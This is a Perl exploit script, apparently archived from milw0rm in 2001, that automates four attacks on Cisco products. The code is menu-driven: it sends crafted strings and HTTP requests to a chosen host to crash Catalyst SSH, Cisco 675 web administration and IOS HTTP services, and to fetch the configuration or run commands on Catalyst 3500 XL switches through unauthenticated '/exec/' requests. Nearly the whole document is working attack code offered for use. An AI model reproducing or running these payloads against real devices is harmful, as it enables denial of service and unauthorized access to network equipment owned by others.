Cisco (Multiple Products) - A tool which automates several attacks against Cisco products

1. #!/usr/bin/perl
2. #
3. # Written by hypoclear - http://hypoclear.cjb.net
4. # Thong-th-thong-th-thong.pl AKA thong.pl is a PERL script
5. # which automates several attacks against various Cisco products.  
6. # To be specific:
7. #
8. # 12-13-00 - Cisco Catalyst ssh Protocol Mismatch DoS Vulnerability
9. # 11-28-00 - Cisco 675 Web Administration Denial of Service Vulnerability
10. # 10-26-00 - Cisco Catalyst 3500 XL Remote Arbitrary Command
11. # 10-25-00 - Cisco IOS Software HTTP Request DoS Vulnerability
12. #
13. #   usage: ./thong.pl -h <host>
14.  
15. use IO::Socket; use Getopt::Std;
16. getopts('h:');
17.  
18. if (defined $opt_h)
19.  {
20.   $HOST = $opt_h;
21.   $PORT;
22.   $STRING = "";
23.   $menu_opt = "";
24.  
25.   menu();
26.   computeOption();
27.   exploit();
28.  }
29.  
30. else {print "\n\n usage ./thong.pl -h <host>\n\n"}
31.  
32. sub menu
33. {
34.   print "\n\n     DATE     VULNERABILITY
35.  1. 12-13-00 - Cisco Catalyst ssh Protocol Mismatch DoS Vulnerability
36.  2. 11-28-00 - Cisco 675 Web Administration Denial of Service Vulnerability
37.  3. 10-26-00 - Cisco Catalyst 3500 XL Remote Arbitrary Command
38.  4. 10-25-00 - Cisco IOS Software HTTP Request DoS Vulnerability  
39.  
40.  Enter Option: ";
41.   $menu_opt = <STDIN>;
42.   chomp ($menu_opt);
43. }
44.  
45. sub computeOption
46. {
47.   if    ($menu_opt == "1"){$PORT = 22; $STRING = "this ain't SSH";}
48.   elsif ($menu_opt == "2"){$PORT = 80; $STRING = "GET ? HTTP/1.0\n\n";}
49.   elsif ($menu_opt == "3"){$PORT = 80; three();}
50.   elsif ($menu_opt == "4"){$PORT = 80; $STRING = "GET /error?/ HTTP/1.0\n\n";}
51.   else  {print "Select a real option!\n"; menu();}
52. }
53.  
54. sub three
55. {
56.   print "Enter file to read or enter D for default (/show/config/cr): ";
57.   $key = <STDIN>;
58.   chomp ($key);
59.   print "\nGetting $key...";
60.  
61.   if (($key eq "D")||($key eq "d"))
62.   {
63.     print "\nGetting /show/config/cr...\n";
64.     $STRING = "GET /exec/show/config/cr HTTP/1.0\n\n";
65.   }
66.   else
67.   {
68.     print "\nGetting $key...\n";
69.     $STRING = "GET /exec$key HTTP/1.0\n\n";
70.   }
71. }
72.  
73. sub exploit
74. {
75.   print "\n\ntrying to exploit $HOST...\n";
76.  
77.   $SOCKET = IO::Socket::INET->new(PeerAddr => $HOST,
78.                                   PeerPort => $PORT,
79.                                   Proto    => "tcp")
80.          || die "Couldn't connect to $HOST\n";
81.  
82.   print "\n$STRING\n";
83.   print $SOCKET "$STRING";
84.  
85.   if ($menu_opt == 3){while (<$SOCKET>){print}}
86.   close($SOCKET);
87. }
88.  
89.  
90. # milw0rm.com [2001-01-27]
91.